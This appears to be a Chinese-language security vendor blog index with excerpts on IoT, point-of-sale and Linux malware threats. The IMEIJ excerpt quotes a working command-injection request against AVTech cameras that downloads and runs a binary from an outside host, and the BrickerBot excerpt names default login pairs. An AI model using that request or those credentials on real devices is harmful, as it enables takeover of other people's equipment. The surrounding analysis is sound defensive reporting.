為什麼硬體設置可能造成物聯網 (IoT) 設備崩潰?

物聯網(IoT ,Internet of Thing)為企業開創了新的機會,也替消費者帶來新的便利時代。而且這一切只會比想像來得更快:根據業界人士估計,到了2020年會有超過240億個物聯網(IoT)設備互聯互通,這還是保守的數據。根據Motley Fool,其他科技巨擘預計在未來三年內將出現500億到2,000億的物聯網(IoT)設備

有一點很清楚:物聯網會變的大,需要大量的管理。畢竟,用錯誤的方式處理這些設備可能會在你的網路內留下安全漏洞。硬體設置可能造成物聯網(IoT)崩潰,重點是你必須正確的啟用你的系統。

 

許多組織都只是安裝硬體而不去變動標準設定,結果留下了讓攻擊者能夠攻擊的重大漏洞

多數設備(包括路由器和印表機)出廠時都帶有預設的簡單密碼和停用的安全功能。許多組織都只是安裝硬體而不去變動標準設定,結果留下了讓攻擊者能夠攻擊的重大漏洞。這種情況會因為物聯網(IoT)設備的啟用數量而加速擴大。畢竟,誰會想去設定每個感應器或替咖啡機設定防火牆?但你還是必須這樣子去啟用物聯網(IoT)設備才不會影響安全性。

不安全的聯網設備可能會帶來網路漏洞。

 

物聯網(IoT)技術仍在發展中,有幾個關於這些設備如何處理敏感資訊的關鍵問題必須先提出。全球隱私執法網路機構(GPEN)隱私掃描發現物聯網(IoT)設備在如何收集、使用和披露資訊上並不清楚。許多公司也並沒有解釋會如何保護用戶資料或該如何刪除個人資料。因為你的網路會產生許多進入點,如果你沒有得到這相關需求和功能的確切答案,你的系統可能就會面臨危險。 Continue reading “為什麼硬體設置可能造成物聯網 (IoT) 設備崩潰?”

工業4.0智慧工廠浪潮正夯 小心工業機器人恐成駭客箭靶

趨勢科技資安威脅研究報告協助揭露多種駭客入侵情境

根據估計,全球工廠至 2018 年將有大約 130 萬套工業機器人分布各種產業,預估全球市場價值可達320億美元(約9.6兆新台幣)[1],這些系統是今日製造業的重要推手,也象徵著「工業 4.0」這波新的自動化智慧工廠革命浪潮的興起,徹底改變人類的歷史;然而隨著這些智慧連線工業機器人數量的大規模成長,它們遭到網路駭客攻擊的機率也隨之擴大。

趨勢科技與米蘭理工大學(Politecnico di Milano)合作,於日前發布資安威脅研究報告「駭客如何入侵今日智慧工廠工業機器人」,首次深度披露駭客入侵工業機器人的手法,並提出安全邁向未來「第四次工業革命」的建議。報告指出目前仍有許多工業機器人還在使用充滿諸多漏洞的老舊作業系統和程式庫,如Linux 2.6 這類軟體;而另一方面,趨勢科技研究團隊也發現全球有超過8萬台工業機器人缺乏完善的網路防護,其中有5千台沒有安全驗證機制,等於是直接向駭客敞開自家大門,外部軟體或裝置可經由網站服務(Web Services) 發出HTTP 請求與工業機器人溝通,而某些工業機器人甚至能夠經由網際網路直接連線,並可以透過匿名方式登入以自由操控;隨著機器人系統在設計上逐漸偏向與人類密切互動,網路上也開始出現專門的機器人應用程式商店,可透過智慧型手機來控制機器人。 

 

就連工業機器人也會遭駭:這問題該如何解決?

談到網路駭客可能入侵機器人,這或許會讓很多人聯想好萊塢的最新熱門電影。但這已經是事實,工業機器人是今日製造業非常重要的推手,從晶片、汽車,甚至到玻璃製品的生產皆然。

趨勢科技最新研究報告:「駭客如何入侵今日智慧工廠工業機器人」(Rogue Robots: Testing the Limits of an Industrial Robot’s Security)首次披露了駭客入侵工業機器人的手法,同時提出了一套安全邁向未來「第四次工業革命」的建議。 Continue reading “工業4.0智慧工廠浪潮正夯 小心工業機器人恐成駭客箭靶”

為何RawPOS端點銷售惡意軟體,要竊取使用者的駕照資訊?

 

儘管屬於最古老端點銷售(PoS)記憶體擷取惡意軟體家族之一,RawPOS(趨勢科技偵測為TSPY_RAWPOS)在今天仍然相當活躍,幕後黑手的主要目標是有高達數十億美元豐厚利潤的飯店業。雖然惡意分子用來進行橫向移動的工具以及RawPOS元件還是跟以前一樣,但這惡意軟體加進了身分竊盜的新行為,讓受害者面臨更大的風險。具體地說,這新行為是關於RawPOS會竊取使用者的駕照資訊,可以用在駭客集團的其他惡意活動。

 

圖1:從2009至2014年的PoS記憶體擷取程式家族

 

RawPOS如何在記憶體內找到信用卡磁條資料 ?

傳統上,PoS威脅的目標是信用卡的磁條資料,並且使用其他元件(如鍵盤側錄程式和後門程式)來取得其他有價值的資料。RawPOS企圖兩者通知,巧妙地修改搜尋條件來取得所需要的資料。

正規表達式是進行模式比對的最古老方法之一,RawPOS會掃描程序內的字串來找出像是磁條內的資料。底下是舊的範例: Continue reading “為何RawPOS端點銷售惡意軟體,要竊取使用者的駕照資訊?”

比 Mirai 更狠, BrickerBot 要讓智慧型家電,監控攝影機… 等 IoT 裝置,永遠變磚塊!

一種針對物聯網(IoT ,Internet of Thing)設備的新惡意軟體 BrickerBot 近日登上媒體,雖然據稱它的攻擊媒介跟 Mirai 類似,但是不同於 Mirai 會將受感染設備變成「Botnet傀儡殭屍網路」電腦,BrickerBot 是所謂「phlashing」(網路刷機) 攻擊的真實案例,這是一種永久阻斷服務攻擊 (簡稱 PDoS),利用硬體裝置的安全漏洞,直接破壞裝置的韌體。

 

BrickerBot 和 Mirai 及 LuaBot (ELF_LUABOT) 這類專門攻擊 IoT 裝置的惡意程式一樣,會藉由裝置預設的帳號密碼來登入裝置。不過,BrickerBot 卻不像其他攻擊 IoT 裝置的病毒將感染的裝置變成殭屍以建立龐大的殭屍網路,進而發動分散式阻斷服務 (DDos) 攻擊。BrickerBot 會在感染裝置上執行一連串的 Linux 指令,導致感染裝置永久損壞。其中某些指令會毀損或惡意修改裝置儲存容量設定及核心參數、阻礙網際網路連線、影響裝置效能,以及清除裝置上所有檔案。

[延伸閱讀:如何讓家用路由器不變成殭屍機器,接收指令進行網路犯罪?]

目前已知 BrickerBot 有兩種版本:

BrickerBot.1 版本專門攻擊使用 BusyBox 軟體的 IoT 裝置 (這是一套類似 Unix 工具包的軟體,適用 Linux 和 Android 系統),裝置若開放了 Telnet 或 Secure Shell (SSH) 連線就可能遭到攻擊,後者之所以遭到攻擊是因為採用了舊版的 SSH 伺服器。一些仍在使用舊版韌體的網路裝置最可能遭到此版本的攻擊。

BrickerBot.2 版本專門攻擊開放 Telnet 服務並使用預設 (或寫死) 帳號密碼的 Linux 裝置。第二個版本會利用 TOR 出口節點 (exit node) 來隱藏其行蹤。

根據趨勢科技對 BrickerBot 的長期觀察,該程式還會利用路由器中的遠端程式碼執行漏洞。而初步分析也證實 BrickerBot 的確會使用預設的帳號/密碼組合 (如:「root/root」和「root/vizxv」) 來試圖登入裝置,此外還會隨機寫入裝置的儲存裝置。

[延伸閱讀: 如何保護路由器以防範家用網路攻擊]

去年,由於 Mirai 殭屍病毒的出現,以及它對企業和個人所造成的嚴重災情 IoT 裝置安全成了最迫切的議題。此次 BrickerBot 的現身,反映出 IoT 裝置在網路攻擊當中正逐漸扮演重要角色,因為某些產業的企業已開始慢慢導入這些裝置,例如:製造業和能源產業。就連像一般家用路由器這樣平凡的裝置,一旦被變成殭屍,就會完全聽從駭客的指示攻擊企業、竊取企業資產,或竊取感染裝置上的資料。

Continue reading “比 Mirai 更狠, BrickerBot 要讓智慧型家電,監控攝影機… 等 IoT 裝置,永遠變磚塊!”

後門敞開:物聯網的另一項挑戰

廠商將帳號密碼寫死在裝置裡面,是消費型物聯網 (IoT) 裝置工業用監控與資料擷取 (SCADA) 裝置、甚至關鍵基礎建設目前所面臨的嚴重問題之一。儘管目前已出現要求廠商嚴格審查原始程式碼與韌體的呼聲,但這類漏洞仍屢見不鮮,對使用者的隱私和資料安全造成危害。

資安研究員 Elliot Williams 在 Hackaday 網站上撰文 指出,絕大多數 DBLTek 公司生產的 GSM 轉 IP 裝置內部都有一組寫死的帳號密碼可用來執行管理員權限的指令。此問題已通報給廠商,但廠商似乎並對該漏洞進行修補,反而是採用了迂迴的作法,多加了一道自製的驗證程序,但其演算法卻是可經由反向工程得知。Trustwave 部落格上的一篇文章對整起事件有完整的說明,而且目前 Github 上也已經可以找到專門攻擊該漏洞的工具。 Continue reading “後門敞開:物聯網的另一項挑戰”

MajikPOS 攻擊手法結合了銷售櫃台系統 (PoS) 惡意程式與遠端存取木馬程式 (RAT)

趨勢科技發現了一個新的 銷售櫃台系統 (PoS) 惡意程式品種:MajikPOS (趨勢科技命名為:TSPY_MAJIKPOS.A),和許多其他 PoS 惡意程式一樣是專為竊取資訊而設計,但其模組化的執行方式卻相當獨特。我們估計 MajikPOS 的第一個感染案例應該出現在 2017 年 1 月 28 日左右。

雖然其他的 PoS 惡意程式,如:FastPOS (新版)、Gorynych 及  ModPOS  也採用了元件化的設計來分擔各種不同功能 (如鍵盤側錄),但 MajikPOS 的模組化方式稍有不同。MajikPOS 只需再從伺服器下載另一個元件就有能力擷取系統記憶體 (RAM) 內的資料。

MajikPOS 是根據歹徒所使用的幕後操縱 (C&C) 面板而命名,該面板是用來發送指令並傳送竊取到的資料。MajikPOS 幕後的駭客在攻擊時結合了 PoS 惡意程式和遠端遙控木馬程式 (RAT),可造成嚴重的傷害。從 MajikPOS 可看出歹徒的手法越來越複雜,讓傳統的防禦顯得毫無招架之力。

入侵點與攻擊過程

趨勢科技Smart Protection Network™ 所得到的資料可以判斷出歹徒使用什麼方法從遠端存取受害者的端點,那就是:Virtual Network Computing (VNC) 和 Remote Desktop Protocol (RDP) 兩種遠端支援工具,不過歹徒還必須猜出受害者的遠端帳號密碼,然後再搭配先前安裝在系統上的 RAT 工具。 Continue reading “MajikPOS 攻擊手法結合了銷售櫃台系統 (PoS) 惡意程式與遠端存取木馬程式 (RAT)”

好暴露,洛杉磯!美國前十大城市的網路資產,有多暴露? Shodan 都知道

Shodan 是個會索引網路資產和物聯網(IoT ,Internet of Thing)聯網設備的網路搜尋引擎,它能夠顯示任何聯網設備的 IP地址,並揭露如應用軟體和韌體版本等細節資訊。

掃描網路設備的安全漏洞是個繁瑣的過程,但如果你想要修補這些漏洞來保護設備和系統免於被入侵,那這是必要的。不需要特別的去爬網站,可以利用像 Shodan 這樣的工具來輕鬆地搜尋對外暴露的網路資產。

網路設備因為維修理由而啟用遠端連線能力,會讓機器容易被攻擊

「沒有防護」和「對外暴露」的網路資產並不是指這些設備已經被入侵。而是說它們缺乏安全防護或設定不良,因而容易遭受網路攻擊。有些網路設備甚至會因為維修理由而啟用遠端連線能力,但這會讓機器更容易被攻擊。

根據趨勢科技在2016年 2月所做的 Shodan 掃描資料分析,我們很驚訝地看到幾個跟工業控制系統(ICS)設備和協定相關的結果。ICS設備是用來操作工業及相關過程,如加熱、通風和空調(HVAC)、發電、水處理等。你可以看到樣本如下:

 

 

圖1-2、Shodan搜尋結果顯示出設備的詳細資訊

Continue reading “好暴露,洛杉磯!美國前十大城市的網路資產,有多暴露? Shodan 都知道”

攻擊 CGI 漏洞的新 Linux 惡意程式

 

長久以來,Linux 一直是企業平台與物聯網(IoT ,Internet of Thing)裝置製造商所偏愛的作業系統。許多不同產業都紛紛採用以 Linux 為基礎的裝置來建置智慧型系統,並利用物聯網 (IoT) 閘道來建立各種業務所需的連網解決方案及服務。然而隨著這類裝置不斷普及,針對 Linux 系統的資安威脅也跟著增加。先前在 2016 年我們即討論過一系列的 Linux 威脅,其中最知名的莫過於 Mirai 惡意程式 (趨勢科技命名為 ELF_MIRAI)。

最近又出現了一個新的 Linux ARM 惡意程式叫做 IMEIJ (趨勢科技命名為 ELF_IMEIJ.A)。此威脅專門攻擊 AVTech (陞泰科技) 監視攝影裝置的漏洞。此漏洞是由匈牙利的資安研究機構 Search-Lab 所發現,並且在 2016 年 10 月公開揭露。不過在此之前,Search-Lab 曾多次試圖聯絡 AVTech 卻未獲回應。

感染流程及類似惡意程式

此惡意程式是經由 CGI 指令感染。遠端駭客會隨機挑選一個 IP 位址然後向該位址發送以下網站指令來攻擊此漏洞:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

更精確一點,它是利用 AVTech 裝置上的 CloudSetup.cgi 程式漏洞將惡意程式下載到裝置上,前述網站指令會讓裝置下載惡意檔案,並且將檔案設定成可執行檔。

圖 1:IMEIJ 的感染流程。 Continue reading “攻擊 CGI 漏洞的新 Linux 惡意程式”

Mirai 原始碼流傳之後….面對轉戰家用網路的殭屍大軍, 光在大門上鎖是不夠的

原本該讓我們生活更美好的聯網用品,竟瞬間變成了攻擊他人的殭屍網路!

從去年 9 月感染了大約 10 萬個物聯網裝置的 Mirai 原始程式碼在網路上流傳開始,駭客們便紛紛忙著開發新的變種來搶攻那些安全堪慮的物聯網裝置,儼然成了一場軍備競賽。
從電燈開關、恆溫控制器,到聯網茶壺、無人機以及各種日常生活用品,讓這些聰明但不安全的智慧裝置連上網際網路,就如同引狼入室。現在光在大門隨便裝個簡單的鎖頭是不夠的,這批最近才剛轉戰家用網路的犯罪集團,他們感染家庭智慧裝置,將它們變成殭屍來替他們從事不法勾當。

這波搶攻裝置、建立殭屍網路熱潮有如一股掏金熱,如果這些聯網用品都像 Dyn 事件當中那些遭到攻擊的裝置一樣,存在著相同的安全漏洞,那麼未來恐怕有重大的災難等著我們。

網域名稱服務 (DNS) 供應商 Dyn 的伺服器在 2016 年底遭到一起重大的網路攻擊,全球多家知名網站因而停擺,包括 Twitter 和 Netflix 皆頓時陷入危機,工程師們為了讓伺服器恢復正常運作而疲於奔命。該事件的罪魁禍首,是一個叫作「Mirai」的物聯網 IoT ,Internet of Thing)殭屍病毒。

駭客的軍備競賽:紛紛開發新變種,搶攻物聯網裝置

網路媒體 All About Circuits 特約作家 Robin Mitchell 將這起網路犯罪事件歸類為「Botnet傀儡殭屍網路」攻擊。基本上,Mirai 幕後的犯罪集團利用此惡意程式感染了大約 10 萬個物聯網裝置,並以此建立了一個殭屍網路。歹徒之所以能夠建立這樣的殭屍網路,只因為物聯網裝置缺乏足夠的入侵防護措施。事實上,這些被感染的裝置很可能還在使用出廠時所內建的預設密碼,而這些密碼非常容易破解。

隨著物聯網裝置的日益普及,我們該如何對付像 Mirai 這類專門攻擊物聯網裝置的惡意程式呢?當這些原本應該讓我們生活更美好的連網用品瞬間變成了敵人,將變成什麼樣的狀況?

如果物聯網繼續這麼容易遭到這類攻擊,那麼情況將更令人擔憂。市場研究機構 Gartner 預測,到了 2020 年,全球將有208 億個物聯網裝置:從智慧家庭恆溫控制器和電燈開關,到聯網茶壺、無人機以及各種日常生活用品。如果這些聯網用品都像 Dyn 事件當中那些遭到攻擊的裝置一樣存在著相同的安全漏洞,那麼未來將有重大的災難等著我們。 Continue reading “Mirai 原始碼流傳之後….面對轉戰家用網路的殭屍大軍, 光在大門上鎖是不夠的”

台灣遭勒索病毒攻擊次數,全球排名第18名 亞洲第7 ;平均每起變臉詐騙,企業損失逾 430 萬台幣 — 四個刷新紀錄的企業威脅


2016 年的威脅情勢屢創新高:新的勒索病毒 Ransomware (勒索軟體/綁架病毒)家族、全球肆虐的變臉詐騙以及各種熱門平台的軟體漏洞。其中,勒索病毒家族數量去年飆升7倍,趨勢科技統計,受勒索病毒攻擊次數全球排行榜中,台灣排名第18名,仍屬於資安高風險國家,亞洲中更是僅次於印度、越南、印尼、日本、菲律賓、泰國等國,亞洲排第7。全球企業損失300億元

勒索病毒造成全球企業損失金額高達10億美元,相當於新台幣300億元

趨勢科技日前發布年度資訊安全總評報告「2016 年資訊安全總評:企業威脅刷新紀錄的一年」,報告顯示2016 年網路威脅屢創新高,勒索病毒 Ransomware (勒索軟體/綁架病毒)和變臉詐騙攻擊或稱為商務電子郵件入侵 (Business Email Compromise,簡稱 BEC)越來越受網路犯罪集團青睞。

其中,勒索病毒造成全球企業損失金額高達 10 億美元(相當於新台幣300億元),且勒索病毒新家族數量較2015年相比成長 7 倍,顯現駭客攻擊對企業的影響幅度有加劇之趨勢。

企業資安威脅在 2016 年寫下新的紀錄,網路勒索成了一大問題。新的勒索病毒家族數量出現前所未有的爆炸性成長,而變臉詐騙攻擊或稱為商務電子郵件入侵 (Business Email Compromise,簡稱 BEC) 也讓企業蒙受了巨大的損失。該年發現的軟體漏洞總數,也突破去年的紀錄,甚至出現了工業用監控與資料擷取 (SCADA) 系統的漏洞。若 2016 年能帶給我們什麼啟示的話,那就是企業應徹底強化自己的資安防護。

以下為四個刷新紀錄的企業威脅:

 

  1. 新的勒索病毒家族數量成長 752%
  2. 平均每起變臉詐騙,企業損失約 14 萬美金(434 萬台幣)
  3. 企業軟體與 SCADA 軟體的漏洞數量名列前茅
  4. Mirai 殭屍網路大約掌控了全球 10 萬個物聯網 IoT ,Internet of Thing) 裝置

 

 

新的勒索病毒家族數量成長 752%

 

勒索病毒攻擊比以往更加難纏,新的勒索病毒家族數量在 2016 年成長了 752%,垃圾郵件是最主要的感染途徑。

每月新增的勒索病毒家族數量

Continue reading “台灣遭勒索病毒攻擊次數,全球排名第18名 亞洲第7 ;平均每起變臉詐騙,企業損失逾 430 萬台幣 — 四個刷新紀錄的企業威脅”